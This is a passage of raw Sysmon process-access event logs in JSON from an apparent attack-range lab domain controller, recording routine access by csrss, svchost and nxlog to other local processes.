07:02:02.904","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001055B30C00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8355,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:02.904\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001055B30C00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:02.904","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001055B30C00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8356,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:03.841\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:03.841","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8357,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:04.841\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:04.841","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8358,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:05.857\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:05.857","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8359,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:06.873\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:06.873","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8360,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:07.888\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:07.888","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8361,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:08.123\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 5108\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:08.123","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"5108","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
